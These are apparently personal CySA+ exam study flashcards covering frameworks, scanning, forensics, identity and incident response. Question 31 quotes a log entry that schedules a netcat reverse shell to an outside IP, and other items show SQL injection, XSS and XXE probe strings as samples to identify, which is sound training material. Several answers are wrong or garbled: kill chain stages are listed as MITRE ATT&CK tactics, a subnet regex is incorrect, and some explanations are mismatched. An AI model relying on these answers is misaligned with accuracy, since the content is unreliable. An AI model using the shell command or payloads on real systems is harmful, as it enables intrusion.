CySA+

Question 1

Vulnerability scan output: CVE-2011-3389
QID 42366 -SSLv3.0/TLSv1.0 Protocol weak CBC mode Server side vulnerability Check with: OpenSSL s_client-connect login.diontraining.com:443 -tls -cipher “AES:CAMELISA:SEED:3DES:DES”
What category should this be classified as?

Answer 1

Web application cryptography vulnerability

Question 2

Your an analyst for a bank with offices in multiple states. You want to create an alert to detect if an employee from one bank office logs into a workstation in an office in another state. What type of detection and analysis are you configuring?

Answer 2

Behavior based

Question 3

You conducted a security scan and found that port 389 is being used when connecting to LDAP for user authentication instead of port 636. The security software recommends you should remediate this. What should you do?

Answer 3

Change all devices and servers that support it to 636 because encrypted services run by default on 636

Question 4

Your org has noticed an increase in the number of security incidents being detected. To better understand the situation and measure the effectiveness of your incident response process, what KPI (key performance indicator) could you use?

Answer 4

Alert volume: an increase may correlate with an increase of detected incidents

Question 5

What tools can be used to conduct a banner grab from a web server on a remote host?

Answer 5

netcat, wget, and telnet
(ftp can’t do it)

Question 6

A recent vulnerability scan found several vulnerabilities on an organization’s public facing IP address. To reduce the risk of a breach, which of the following vulnerabilities should be prioritized for remediation?

Answer 6

-A cryptographically weak cipher
-An HTTP response that reveals an internal IP address
-A website utilizing a self-signed SSL cert
*A buffer overflow that is know to allow remote code execution

Question 7

An adversary compromised a web server in your network using a zero-day exploit and then uses it as a C2 server for further attacks. Which stage of the MITRE ATT&CK framework does the use of a C2 server illistrate?

Answer 7

Command and Control (C2)

Question 8

Which analysis framework provides a graphical depiction of the attackers approach relative to a kill chain?

Answer 8

Diamond Model of Intrusion Analysis

Question 9

Which framework provides the most explicit detail regarding how to mitigate or detect a given threat?

Answer 9

MITRE ATT&CK

Question 10

According to the Center for Internet Securitiy’s system design recommendation, which control category would contain info on the best security practices to implement within SDLC?

Answer 10

Application Software Security

Question 11

A cybersecurity analyst has received an alert that sensors continuously observe a well-know call home messages at their network boundary. Still, the orgs proxy firewall is properly configured to successfully drop the messages before leaving the network. What is the most likely cause of the message being sent?

Answer 11

An infected workstation is attempting to reach a C2 server

Question 12

You’re investigating traffic involving 3 separate IP addresses (192.168.66.6, 10.66.6.10, 172.16.66.1). What REGEX expression would you use to be able to capture ONLY these 3 IP addresses?

Answer 12

\b(192.168.66.6)|(10.66.6.10)|(172.16.66.1)\b

Question 13

You are conducting a quick nmap scan of a target network. You want to conduct a SYN scan but you don’t have the raw socket privileges on you workstation. What command should you use to conduct the SYN scan from your workstation?

Answer 13

nmap -sT

Question 14

Nicole’s org doesn’t have the budget for 24/7 security monitoring of their network. To supplement her team, she contracts with a managed SOC service. What service provider would be best suited for this?

Answer 14

MSSP: Managed Security Service Provider

Question 15

A companies CIO is concerned about the liability of a security vulnerability being exploited in their self-driving car where someone may die. What methodology would provide the single greatest mitigation if successfully implimented?

Answer 15

Formal methods of verification

Question 16

What provides a standard nomenclature for describing security-related software flaws?

Answer 16

CVE

Question 17

You suspect a system’s firmware has been compromised. What type of firmware would provide resistance against suck attack?

Answer 17

Trusted Firmware

Question 18

What REGEX expression would provide the appropriate output when searching logs from only the IP subnet 172.161.1.224/26

Answer 18

\b172.161.1.(2[0-4][0-9]|25[0-5]|19[2-9])\b

Question 19

What is least likely to be included in a data retention policy?

Answer 19

Classification Info

Question 20

As a forensic analyst, what should you collect first?

Answer 20

L3 Cach(CPU registry), RAM Cache(System Memory), SSD(Storage Devices), Backup drives

Question 21

Your company is adopting a cloud first architecture model. Management wants to decommission the on-prem SIEM and migrate it to the cloud. What issues could arise?

Answer 21

Legal and regulatory issues may prevent data migration to the cloud

Question 22

Diamond Model of Intrusion Analysis

Answer 22

Framework for understanding the 4 key elements of cyber attacks. Adversary, victim, infrastructure, capability

Question 23

MITRE ATT&CK

Answer 23

Framework detailing tactic, techniques, and procedures.
Reconnaissance · Weaponization · Delivery · Exploitation · Installation · Command & Control (C2) · Actions on Objectives

Question 24

OWASP Testing Guide

Answer 24

Methodology for testing web application security

Question 25

Cyber Kill Chain

Answer 25

Describes the stages of a cyber attack. Makes no allowances for an adversarial retreat

Question 26

What secure coding practice ensures a character like < is translated into the &lt string when written to an HTML page?

Answer 26

Output Encoding

Question 27

You are a cyber analyst at a privatly owned bank. Which regulations would have the greatest impact on your bank’s cybersecurity program?

Answer 27

GLBA
Gramm-Leach-Bliley Act
Federal law explaining how to protect customer’s private info

Question 28

Root Cause Analysis

Answer 28

Involves investigating an incident to determine its origin and how it unfolded, with an aim of preventing similar incidents

Question 29

Forensic Analysis

Answer 29

Through investigation thats focus in broader and often includes legal implications

Question 30

What can prevent firmware downgrades?

Answer 30

eFuse
Intel-designed mechanism to allow software instructions to blow a transistor in the hardware chip

Question 31

You see the following log entry. What is it and how to stop it?
sc config schedule start auto
net start schedule
at 10:42 ““c:\temp\nc.exe 123.12.34.12 443 -e cmd.exe””

Answer 31

The host is using the Windows Task Scheduler at 10:42 to run nc.exe from the temp folder to create a remote connection to 123.12.34.12
You should recommend removing the host from the network

Question 32

What technique would provide the largest increase in security on a network with ICS, SCADA, and IOT devices?

Answer 32

User and entity behavior analytics

Question 33

tcpdump

Answer 33

Primarily used for capturing and analyzing network packets
Faster than Wireshark
No GUI

Question 34

What sanitization technique removes data, overwriting a hard drive with randoms 1s and 0s?

Answer 34

Clear

Question 35

Which part in a federation provides services to members of the federation?

Answer 35

RP: Relying Party

Question 36

IdP

Answer 36

Identity Provider
Provides identities, makes assertions about those identities and releases info about identity holders

Question 37

SAML

Answer 37

Security Assertion Markup Language
Open standard for exchanging authentication & authorization data between parties between an IdP

Question 38

SSO

Answer 38

Single Sign On
Authentication scheme that allows users to log in with a single ID and password to related but independent software systems across a federation

Question 39

What technique is most likely to identify a buffer overflow vulnerability in an app during development?

Answer 39

Static code analysis

Question 40

You are searching a Linux server for a possible backdoor during a forensic investigation. Which part of the file system should you search for evidence?

Answer 40

/etc/xinetd.conf
newer versions: sytemctl

Question 41

According to MITRE ATT&CK framework what capability can identify and exploit a zero-day vulnerablity?

Answer 41

Developed

Question 42

What type of solution would you classify an FPGA?

Answer 42

Anti-tamper
Field-Programmable Gate Array

Question 43

WannaCry’s use of Eternal Blue represents which phase of the Cyber Kill Chain?

Answer 43

Weaponization

Question 44

What is the most widely used web-application scanner?

Answer 44

ZAP
OWASP Zed Attack Proxy

Question 45

What are 3 Infrastructure vulnerability scanners?

Answer 45

Qualys, OpenVAS, Nessus

Question 46

What type of file is commonly used to store configuration settings for a macOS system?

Answer 46

plists
(property lists)

Question 47

During a vulnerability scan you notice that the hostname www.diontraining.com is resolving to www.diontraining.com.akamized.net instead. Based on that info what do you suspect is true?

Answer 47

You scanned a CDN-hosted version of the site.
CDN: Content Delivery Network
Geographically distributed network of proxy servers

Question 48

What is the proper order of the UEFI boot phases?

Answer 48

Security
Pre-EFI initialization
Driver Execution Environment
Boot Device Select
Transient System Load
Runtime

Question 49

What proprietary tool is used to create forensic disk images without making changes to the original evidence?

Answer 49

FTK Imager

Question 50

Memdump

Answer 50

Used to collect content within RAM on a given host

Question 51

Autopsy

Answer 51

Open-source forensic tool suite

Question 52

Which role validates the user’s identity when using SAML for authentication?

Answer 52

IdP

Question 53

You need to sanitize hard drives from some leased workstations before returning them to a supplier. The hard drives contained sensitive data. What is the most appropriate proccess to ensure that data exposure doesn’t occur during this process?

Answer 53

Purge, validate, and document the sanitation of the drives

Question 54

What technology can be used to ensure that users who log into a network are physically in the same building as the network they are attempting to authenticate on?

Answer 54

GPS location and NAC

Question 55

What describes the infrastructure needed to support the other architectural domains in the TBGAF framework?

Answer 55

Technical architecture

Question 56

Dion Training wants to implement tech within their corporate network to BEST mitigate risk that a zero-day virus might infect their workstations. What should be implemented FIRST?

Answer 56

Application Whitelisting

Question 57

You conduct a vulnerability scan of a data center and notice that a managed interface for a virtualization platform is exposed to your vulnerability scanner. What network should the hypervisor’s management interface be exposed to, to ensure the best security of the virtualization platform?

Answer 57

Management Network

Question 58

You have just returned from a business trip from a country with a high intellectual property theft rate. What precautions should you take before reconnecting your laptop to your corporate network?

Answer 58

Scan for malware
Physically inspect the laptop and compare it with images made before you left

Question 59

You are trying to find some files deleted by a user on a Windows workstation. What 2 locations are most likely to contain the deleted files?

Answer 59

Recycling Bin
Slack Space

Question 60

What does the Infrastructure component of the Diamond Model refer to?

Answer 60

The physical or virtual resources used (phishing)

Question 61

Persistance

Answer 61

MITRE ATT&CK framework
Stage that describes how the adversary maintains a foothold in the network

Question 62

Command and Control

Answer 62

MITRE ATT&CK framework
Represents the communication channel

Question 63

You want to prevent hosts from connecting to known malware distribution domains. What type of solution should be used without deploying endpoint protection software or an IPS?

Answer 63

DNS Blackholing
Uses a list known domains/IPs belonging to malicious hosts and uses an internal DNS server to create a fake reply

Question 64

An org want to choose an authentication protocol that can be used over an insecure network without implementing additional encryption services. What protocol should you use?

Answer 64

Kerberos

Question 65

An analyst suspect that a trojan has victimized a Linux system. Which command should be run to determine where the current bash shell is being executed?

Answer 65

which bash

Question 66

SCAP

Answer 66

Security Content Automation Protocol
Multi-purpose framework of specifications supporting automated configuration, vulnerability, and patch checking, tech control compliance activities, and security measurement

Question 67

Security Onion

Answer 67

Free open-source Linux distro for intrusion detection, enterprise security monitoring, and log management

Question 68

What utilizes a well-written set of carefully developed and tested scripts to orchestrate runbooks and generate consistent server builds across an enterprise?

Answer 68

Infrastructure as Code (IaC)

Question 69

A forensic analyst needs to access a macOS encrypted drive that uses File Vault2. What are 3 means of unlocking the volume?

Answer 69

Extract the keys from iCloud
Retrieve the key from memory while the volume is mounted
Obtain the recovery key

Question 70

You’re a security Admin and need to respond to an ongoing spearphishing campaign against your org. What should be used as a checklist of actions to perform to detect and respond to this particular incident?

Answer 70

Playbook

Runbook is an automated response

Question 71

Input validation can prevent what vulnerabilities?

Answer 71

SQL Injection
Cross-Site Scripting
XML Injection
Directory Traversal

Question 72

What is the lowest layer of bare-metal virtualization environment?

Answer 72

The physical hardware

Question 73

What type of vulnerability scan would provide the best results if you want to determine if the target’s configuration settings are correct?

Answer 73

Credentialed Scan

Question 74

Non-Credentialed Scan

Answer 74

Vulnerability scan that relies on external resources for configuration settings, which can be incorrect or altered

Question 75

If you want to conduct an operating system identification during an nmap scan, what syntax should you use?

Answer 75

nmap -O

Question 76

You need to verify the installation of a critical Windows patch on your org’s workstations. What method would be the most efficient to validate the current patch status for all Windows 10 workstations?

Answer 76

Use SCCM to validate patch status
Microsoft’s System Center Configuration Manager

Question 77

You review Python script used in your org’s automation process. You notice the following line of code: os.system(‘rm -rfl’). What potential security concern does the code represent?

Answer 77

Command Injection

Question 78

Which operating system feature is designed to detect malware that is loaded early in the system startup process or before the OS can load itself?

Answer 78

Measured Boot

Question 79

If you post too much on social media like name, DOB, hometown,… it is easier for an attacker to conduct what type of attack?

Answer 79

Cognitive Password Attack

Question 80

What authentication protocol was developed by Cisco to provide authentication, authorization, and accounting services?

Answer 80

TACACS+
Terminal Access Controller Access-Control System

Question 81

What type of encryption would ensure the best security of a website?

Answer 81

TLS

Question 82

You review the logs of a proxy server and saw the following URL: http://test.diontraining.com/index/php?id=1%20OR%2017-7%3d10
What type of attack has likely occured?

Answer 82

SQL Injection

Question 83

A pentester is conducting an assessment of a wireless network that is secure using WPA2 Enterprise encryption. What are the 2 major differences between conducting reconnaissance of a wireless network vs wired?

Answer 83

Physical accessibility and Encryption

Question 84

Management is concerned about rogue devices being attached to the network. What solutions would quickly provide the most accurate info that could be used to identify rogue devices on the network?

Answer 84

Router and Switch-based MAC address reporting

Question 85

What automatically combines multiple disparate sources of info to form a complete picture of events for analysts to use during an incident response or when conducting proactive threat hunting?

Answer 85

Data Enrichment

Question 86

You’re about to conduct forensics on a virtual machine. What process should be used to ensure that all of the data is acquired forensically?

Answer 86

Suspend the machine and copy the contents of the directory it resides in

Question 87

What will an adversary do during the exploitation phase of the Lockheed Martin kill chain?

Answer 87

Take advantage of a software, hardware, or human vulnerability
Wait for a user to click on a malicious link
Wait for a malicious email attachment to be opened

Question 88

When trying to thoroughly examine the security posture of a major e-commerce platform, which framework serves as an exhaustive guide dedicated explicitly to this purpose?

Answer 88

OWASP Testing Guide

Question 89

Where should a forensic analyst search to find a list of the wireless networks that a laptop has previously connected to with a company-owned laptop?

Answer 89

Search the registry

Question 90

What remediation strategies are the MOST effective in reducing the risk to an embedded ICS from a network-based compromise?

Answer 90

Segmentation
Disable unused services

Question 91

What are 3 concerns when migrating to a serverless architecture?

Answer 91

Protection of endpoint security
Dependency on the cloud service provider
Limited disaster recovery options

Question 92

A cyber analyst is reviewing the logs of a proxy server and saw the following URL: https://www.google.com/search?q=password+filetype%3xls+site%3Adiontraining.com&pws=0&filter=p.
What is true about the results of this search?

Answer 92

Personalization is turned off (site%3Adiontraining.com) and (&) disables personalization

Returns only files hosted at diontraining.com
(filetype%3xls, %3A is the hex-code for ‘:’) and (+) limits results

Returns only Microsoft Excel Spreadsheets
(q=password) and (+) have filetype equal to xsl

Question 93

Which types of digital forensic investigations is most challenging due to the on-demand nature of the analyzed assests?

Answer 93

Cloud services

Question 94

Your company has announced a change to an “API first” model of software development. As a cyber analyst you are immediately concerned about the possibility of an insecure deserialization vulnerability in this model. What is the primary basis for an attack against this vulnerability?

Answer 94

Accepting serialized objects from untrusted sources or the use of serialized non-primitive data may lead to remote code execution

Question 95

What does a User Agent request a resource from when conducting a SAML transaction?

Answer 95

SP (Service Provider)

Question 96

You company has just enabled key-based authentication on its SSH server. What action should be performed to secure the SSH server?

Answer 96

Disable password authentication for SSH

Question 97

You are creating a script to filter some logs so that you can detect any suspected malware beaconing. What are some typical means of identifying a malware beacons behavior on the network?

Answer 97

The beaconing interval
The beacon’s persistence
The removal of known traffic

Question 98

Policy

Answer 98

Contains procedures and guidelines covering appropriate priorities, actions, and responsibilities in the event of a security incident

Question 99

Procedure

Answer 99

Provide detailed, tactical info for the CSIRT to respond to an incident

Question 100

What method should a cyber analyst use to locate any instances on the network where passwords are being sent in cleartext?

Answer 100

Full packet capture

Question 101

You need to determine the best way to test operating system patches in a lab environment before deploying them to your automated patch management system. Your network has several different OSs in use but you only have 1 machine available to test the patches. What is the best environment to use to perform the testing of the patches before deployment?

Answer 101

Virtualization

Question 102

In the Colonial Pipeline ransomeware attack, the DarkSide ransomware group fulfilled their intent by encrypting files and demanding a ransom. Which phase of the Cyber Kill Chain does this represent?

Answer 102

Actions on Objectives

Question 103

Lockheed Martin Kill Chain Stages

Answer 103

Reconnaissance
Weaponization
Delivery
Exploitation
Installation
Command & Control (C2)
Actions on Objectives

Question 104

In the Cyber Kill Chain, at which stage does an attacker deliver the actual working part of the attack?

Answer 104

Exploitation

Exploitation-attacker leverages vulnerability to execute main part of attack
Weaponization-attacker creates malicious payload, does not deliver it

Question 105

Riaan’s company runs critical web applications. During a vulnerability scan, Riaan found a serious SQL injection vulnerability in one of their web applications. The system cannot be taken offline to remediate the vulnerability. Which compensating control should be recommended until the system can be remediated?

A. Vulnerability scanning
B. Encryption
C. WAF
D. IPS

Answer 105

C. WAF

Question 106

A cybersecurity analyst reviews the logs of a proxy server and saw the following URL, https://www.google.com/search?q=*%40diontraining.com
Which is true about the results of the search?

A. Returns all web pages containing an email address affiliated with diontraining.com
B. Returns all web pages containing the text diontraining.com
C. Returns all web pages hosted at diontraining.com
D. Returns no useful results

Answer 106

A. Returns all web pages containing an email address affiliated with diontraining.com

%40 is the hex code for @

Question 107

The 2018 Drupalgeddon2 incident saw hackers actively exploiting a highly critical vulnerability (CVE-2018-7600) in Drupal content management system. Which versions of Drupal’s security patch would have remediated this?

A. Durpal 7.56/8.3.4
B. Durpal 7.54/8.2.7
C. Durpal 7.57/8.4.5
D. Durpal 7.58/8.5.1

Answer 107

D. Durpal 7.58/8.5.1

Question 108

Which of the following functions is not provided by TPM?

A. User authentication
B. Random number generation
C. Sealing
D. Remote attestation
E. Binding
F. Secure Generation of cryptographic keys

Answer 108

A. User authentication

Question 109

Which of the following is NOT a host-related indicator of compromise?

A. Memory Consumption
B. Beaconing
C. Processor Consumption
D. Drive Capacity Consumption

Answer 109

B. Beaconing

Beaconing is considered a network-related IoC

Question 110

A cybersecurity analyst notices the following XML transaction while reviewing the communication logs for a public-facing application that receives XLM input directly from its clients: ]>&abc;

Based on the output, which is true?

A. The application is using parameterized queries to prevent XML injections
B. An XML External Entity (XXE) vulnerability has been exploited and its possible that that password has downloaded the file “ect/passwd”.
C. ISO-8859-1 only covers the Latin alphabet and may preclude other languages from being used
D. There is no concern since “/etc/passwd” does not contain any system passwords

Answer 110

B. . An XML External Entity (XXE) vulnerability has been exploited and its possible that that password has downloaded the file “ect/passwd”.

Question 111

Which of the following are the two most important factors when determining a containment strategy?

A. Preservation of evidence
B. Identification of whether the intrusion is the primary attack or a secondary one
C. Prevention of an ongoing intrusion or data breach
D. Avoidance of alerting the attacker that they have been discovered
E. Ensuring the safety and security of all personnel

Answer 111

C & E

Question 112

You’re a cybersecurity analyst who has been given the output from a system administrator’s Linux terminal. Based on the output, which of the following is true?
BEGIN OUTPU ————
#nmap win 2k16.local
Nmap scan report for win2k (192.168.2.15)
Host is up (0.132452s latency)
Not shown: 997 closed ports
Port. State. Service
22/tpc. open. ssh
80/tpc. open http
#nc win2k16.local 80
220 win2k16.local DionTraining SMTP Server (Postfix/2.4.1)
#nc win2k16.local
22 SSH-2.0-OpenSSH_7.2 Debian-2
#_——————– END OUTPUT

A. Your org has a vulnerable version of the SSH server software installed
B. Your email server has been compromised
C. Your email server is running on a non-standard port
D. Your web server has been compromised

Answer 112

C. Your email server is running on a non-standard port.

Output shows SMTP is running on port 80 and the standard port is 25.

Question 113

A new security appliance was installed on a network as part of a managed service deployment. The vendor controls the appliance and the IT team cannot log in or configure it. The IT team is concerned about the appliance receiving the necessary updates. Which of the following should be performed to minimize the concern?

A. Scan and patch the device
B. Automatic Updates
C. Configuration management
D. Vulnerability scanning

Answer 113

D. Vulnerability scanning

Question 114

Dion Training is concerned with the possibility of employees accessing another user’s workstation in secured areas without their permission. Which would BEST prevent this from happening?

A. Install security cameras in secure areas to monitor logins
B. Require biometric identification for user logins
C. Require username and password for user logins
D. Enforce a policy that requires passwords to be changed every 30 days

Answer 114

B. Require biometric identification for user logins

Question 115

You company has just finished replacing all of its computers with brand new workstations. A coworker asks the company if she can have the old computers that are about to be thrown away so she can refurbish them be reinstalling a new OS and donate them. The owner thinks it’s a great idea but is concerned about the sensitive info on the drives. What is the best solution to sanitize or destroy the data while ensuring the computers will still be usable?

A. Purging
B. Shredding
C. Degaussing
D. Wiping

Answer 115

D. Wiping

Can’t reuse hare drive once it has been degaussed.
Generally can’t reuse after purging.

Question 116

Which term is used in software development to refer to the method in which app and platform updates are committed to a production environment rapidly?

A. Continuous integration
B. Continuous monitoring
C. Continuous deployment
D. Continuous delivery

Answer 116

C. Continuous deployment

Question 117

A major cyber incident has occurred at your org. As part of the incident response team you have been tasked with analyzing the incident, including who caused it, what systems were affected, when it occurred, where it originated from, and why it happened. What kind of report are you preparing?

A. Incident declaration report
B. Incident response report
C. Regulatory reporting
D. Root cause analysis report

Answer 117

B. Incident response report

Question 118

The security team from Kelly Nexis Analytics has detected the Apache Log4j vulnerability in JIRA. What is a practical method for the team to eliminate this vulnerability?

A. Patching
B. Antivirus Software
C. Virtual Private Network
D. Firewall Implimentation

Answer 118

A. Patching

Question 119

Which of the following vulnerability scanning tools would be used to conduct a web application vulnerability assessment?

A. OpenVAS
B. Nessus
C. Nikto
D. Qualys

Answer 119

C. Nikto

Question 120

Which of the following has occurred if a device fails to activate because it has detected an unknown modification?

A. Improper authentication
B. Obfuscation
C. Self-checking
D. Failed trust foundry

Answer 120

C. Self-checking

Question 121

Which of the following is a technique used in Secure Disposal?

A. Zero-fill
B. Degaussing
C. Erasing
D. Clearing

Answer 121

B. Degaussing

Clearing does not destroy

Question 122

An SNMP sweep is being conducted but the sweep received no-response replies from multiple addresses that are believed to belong to active hosts. What does this indicate to a cybersecurity analyst?

A. The community string being used is invalid
B. Any listed answers may be true
C. The machines are not running SNMP servers
D. The machines are unreachable

Answer 122

B. Any listed answers may be true

Question 123

Dion consulting group has been hired to analyze the cybersecurity model for a new videogame console system. The manufacturer’s team has come up with four recommendations to prevent intellectual property theft and piracy. As the cybersecurity consultant on this project, which of the following would you recommend implementing first?

A. Ensure that each individual console has its own unique key for decrypting individual licenses and tracking which console has purchases which game
B. Ensure that all screen capture content is visibly watermarked
C. Ensure that all games for the console are distributed as encrypted so that they can only be decrypted on the game console
D. Ensure that all games require excessive storage sizes so that it is difficult for unauthorized parties to distribute

Answer 123

A. Ensure that each individual console has its own unique key for decrypting individual licenses and tracking which console has purchases which game

Question 124

Which of the following protocols is commonly used to collect information about CPU utilization and memory usage from network devices?

A. NetFlow
B. SNMP
C. MIB
D. SMTP

Answer 124

B. SNMP (Simple Network Management Protocol)

Question 125

Which protocol is paired with OAuth2 to provide authentication of users in a federated identity management solution?

A. Kerberos
B. ADFS
C. OpenID Connect
D. SAML

Answer 125

C. OpenID Connect

Question 126

What type of information will a Cisco switch log be configured to capture logs at level 7?

A. Emergencies
B. Warnings
C. Debugging
D. Errors

Answer 126

C. Debugging

0-Emergencies

Question 127

A vulnerability scan has returned the following:
Detailed Results
10.56.17.21 (APACHE-2.4)
Windows Shares
Category: Windows
CVE ID: -
Vendor Ref: -
Bugtraq ID: -
Service Modified - 8.30.2017
Enumeration Results:
print$c:\windows\system32\spool\drivers
files c:\FileShare\Accounting
Temp c:\temp

What best describes the output?

A. There is no CVE present, so this is a false positive caused by Apache running on a Windows server
B. There is an unknown bug in an Apache server with no Bugtraq ID
C. windows Defender has a known exploit that must be resolved or patched
D. Connecting to the host using a null session allows enumeration of the share names on the host

Answer 127

D. Connecting to the host using a null session allows enumeration of the share names on the host

Question 127

Your org is transitioning to a cloud environment and wants to ensure its new infrastructure is secure. Ehat tool could you utilize to assess the security of your cloud infrastructure?

A. Pacu
B. Nmap
C. Nessus
D. Burp Suite

Answer 127

A. Pacu

This is designed for AWS environments.
Nessus is not specifically designed for cloud infrastructure assessments

Question 128

You are conducting an incident response and want to determine if any account-based IoCs exist in a compromised server. Which of the following would you NOT search for on the server?

A. Unauthorized sessions
B. Malicious processes
C. Off-hours usage
D. Failed logins

Answer 128

B. Malicious processes

Malicious process is host-based IoC and not directly associated with an account-based IoC

Question 129

Which of the following actions should you perform during the post-incident activities of an incident response?

A. Create an incident summary reporting with in-depth technical recommendations for future resourcing and budgeting
B. Perform evidence retention in accordance with the timescale defined by the regulatory or legal impact of the incident
C. Ensure confidentiality of the lessons learned report by not sharing it beyond the incident response team who handled the investigation
D. Sanitize storage devices that contain an dd images collected to prevent liability arising from evidence collection

Answer 129

B. Perform evidence retention in accordance with the timescale defined by the regulatory or legal impact of the incident

Question 130

A cybersecurity analyst has deployed a custom DLP signature to alert on any files that contain numbers in format of a social security number. Which of the following concepts within DLP is being utilized?

A. Classification
B. Statistical matching
C. Document matching
D. Exact data match

Answer 130

D. Exact data match

Question 131

What port does LDAP run on?

Answer 131

389

Question 131

You org has just migrated to provisioning its corporate desktops as virtual machines and accessing them using thin clients. The org believes this will enhance security since the desktop can be rewritten with a new baseline image every time the user logs into it. Based on this scenario, which technology has the organization adopted?

A. VPC
B. UEBA
C. VPN
D. VDI

Answer 131

D. VDI

VDI = Virtual Desktop Infrastructure
VPC = Virtual Private Cloud
UEBA = User and Entity Behavior Analytics

Question 132

Which of the following is not normally part of an endpoint security suite?

A. IPS
B. Software firewall
C. VPN
D. Anti-virus

Answer 132

C. VPN

Question 133

Natalie wants to create a backup of the permissions before making changes to the Linux workstation she will remediate. What Linux tool can she use to back up the permissions of the system’s complete directory structure?

A. iptables
B. chbkup
C. getfacl
D. aclman

Answer 133

C. getfacl

aclman and chbkup are not legit commands
iptables is to configure the firewall

Question 134

During a simulated attack on your org’s network, the red team identified several vulnerabilities and successfully exfiltrated data. The red team then used these vulnerabilities and the steps they took to create an example of a possible real-world attack. Which framework does this attack sequence BEST represent?

A. MITRE ATT&CK
B. OWASP Testing Guide
C. Cyber Kill Chain
D. Diamond Model of Intrusion Analysis

Answer 134

C. Cyber Kill Chain

Question 135

Matt is creating a scoping worksheet for an upcoming penetration test for his organization. Which of the following techniques is NOT usually included in a pen test?

A. Denial-of-service Attack
B. Physical Penetration Attempts
C. Reverse Engineering
D. Social Engineering

Answer 135

A. Denial-of-service Attack

Question 136

You have been given access to a Windows system located on an Active Directory domain as part of a white box pen test. Which of the following commands would provide information about the other systems on this network?

A. net group
B. net use
C. net config
D. net user

Answer 136

B. net use

net group is only used on DCs
net user would show accounts
net config allow server and workstations services to be controlled once identified

Question 137

During a port scan you discovered a service running on a registered port. Base on this, what do you know about this service?

A. The service is running on a port between 0-1023
B. The service’s name on the registered port
C. The service is running on a port between 1024 - 49151
D. The vulnerability status os the service on the registered port

Answer 137

C. The service is running on a port between 1024-49151

Question 138

Which of the following categories of controls are firewalls, IDS, and a RADIUS server classified as?

A. Administrative Controls
B. Technical Controls
C. Physical Controls
D. Compensating Controls

Answer 138

B. Technical Controls

Question 139

You just finished conducting a remote scan of a class C network block using the following command ‘nmap -sS 202.15.73.0/24’. The results only showed a single web server. Which of the following techniques would allow you to gather additional info about the network?

A. Use and IPS evasion technique
B. Scan using the -p 1-65535 flag
C. Usa a UDP scan
D. Perform a scan from on-site

Answer 139

D. Perform a scan from on-site

Question 140

Which tool should a malware analyst utilize to track the registry’s changes and the file system while running a suspicious executable on a Windows system?

A. ProcDump
B. Autoruns
C. Process Monitor
D. DiskMon

Answer 140

C. Process Monitor

Autoruns show what programs are configured to run during bootup or login

Question 141

What is a reverse proxy commonly used for?

A. Directing traffic to internal services if the contents of the traffic comply with the policy
B. Allowing access ti a virtual private cloud
C. To prevent unauthorized use of cloud services from the local network
D. To obfuscate the origin of a user within a network

Answer 141

A. Directing traffic to internal services if the contents of the traffic comply with the policy

Question 142

During which incident response phase is the preservation of evidence performed?

A. Detection and analysis
B. Containment, eradication, and recovery
C. Preparation
D. Post-incident activity

Answer 142

B. Containment, eradication, and recovery

Question 143

During a recent security incident, you, as an incident responder, documented each action and decision that took place, from the initial detection to final remediation. This detailed timeline could prove particularly useful for which part of the incident response reporting?

A. Impact
B. Executive summary
C. Lessons learned
D. Scope

Answer 143

C. Lessons learned

Question 144

You’re analyzing the logs of a web server and see the following:
192.168.1.25 - - [05/Aug/2020:15:16:42 -0400] “Get /%27%27;!-%22%3CDION%3E=&{()}
HTTP/1.1” 404 310 “-“ “Mozilla/5.0 (X11; Linux x86_64; en-US; rv:1.9.0.12)Gecko/2009070812 Ubuntu/19.04 (disco dingo) Firefox/3.0.12”

Based on this, which following attack was attempted?

A. XML injection
B. Buffer overflow
C. SQL injection
D. XSS

Answer 144

D. XSS

The attack was obfuscated by the attacker using HTML encoding. The encoding of %27%27 translates to two single quote marks (‘ ‘).

Question 145

You are analyzing DNS logs looking for indicators of compromise associated with the use of a fast-flux network. You are already aware that the names involved in this particular fast-flux network are longer than 50 characters and always end in a .org top-level domain. Which of the following REGEX expressions would you use to filter DNS traffic that matches this?

A. \b[A-Za-z0-9.-]{50,251}+.org
B. \b[A-Za-z0-9.-]{50,251}+.org
C. \b[A-Za-z0-9.-]{50,251}+.org
D. \b(A-Za-z0-9.-){50,251}|.org

Answer 145

A. \b[A-Za-z0-9.-]{50,251}+.org

+ means it matches between 50 and 251 instances of any of the preceding letters (A-Z, a-z, 0-9, period, and the minus symbol)

Question 146

During the Sony Pictures hack in 2014, the attackers installed a wiper malware names Destover on Sony’s systems to erase data. Which phase of the Cyber Kill Chain does this represent?

A. Delivery
B. Installation
C. Reconnaissance
D. Actions and Objectives

Answer 146

B. Installation

Question 147

A penetration tester is using a known vulnerability to compromise an Apache webserver. After they gain access to the server, what is their next step to pivot to a protected system behind the DMZ?

A. Vulnerability scanning
B. Patching
C. Privilege escalation
D. Installing additional tools

Answer 147

C. Privilege escalation

Question 148

A cybersecurity analyst is reviewing the DNS logs for his company’s networks and sees the following:
$ cat dns.log | bro-cut
querygu2m9qhychvxrvh0eift.comoxboxkgtyx9veimcuyri.com4f3mvgt0ah6mz92frsmo.comasvi6d6ogplqyfhrn0p7.com5qlark642x5jbissjm86.com

Based on this potential IoC, which of the following hypotheses should you make to begin threat hunting?

A. The DNS server is running out of memory due to a memory resource exhaustion attack
B. Data exfiltration is being attempted by an APT
C. Fast flux DNS is being used for an attacker’s C2
D. The DNS server’s hard drive is being used as a staging location for a data exfiltration

Answer 148

C. Fast flux DNS is being used for an attacker’s C2

Question 149

After a successful spear-phishing attack, an adversary has gained access to your organization’s network. The adversary then performs a Pass-the-Hash attack to gain administrative privileges, moved horizontally in the network, and finally exfiltrates sensitive data. What stage of the MITRE ATT&CK framework does this movement represent?

A. Lateral Movement
B. Exfiltration
C. Initial Access
D. Credential Access

Answer 149

A. Lateral Movement

Question 150

You suspect that a service called explorer.exe on a Windows server is malicious, and you need to terminate it. Which of the following tools would NOT be able to terminate it?

A. sc
B. wmic
C. services.msc
D. secpol.msc

Answer 150

D. secpol.msc

secpol.msc = security policy auditor

Question 151

In the preparation phase of the incident management life cycle, which aspect involved assembling and maintaining a collection of scripts, applications, and other software that can be used to respond to a cyber threat effectively?

A. Incident response plan
B. Business continuity disaster recovery
C. Tools
D. Playbooks

Answer 151

C. Tools

Question 152

Evaluate the following log entry:
Jan 11 05:52:56 lx1 kernel: iptables INPUT drop IN=eth0 OUT= MAC=00:15:5d:01:ca:55:00:15:5d:01:ca:ad:08:00 SRC=10.1.0.102 DST=10.1.0.10 LEN=52 TOS=0x00 PREC=0x00 TTL=128 ID=3988 DF PROTO=TCP SPT=2583 DPT=23 WINDOW=64240 RES=0x00 SYN URGP=0

Based on this, which statements are true?

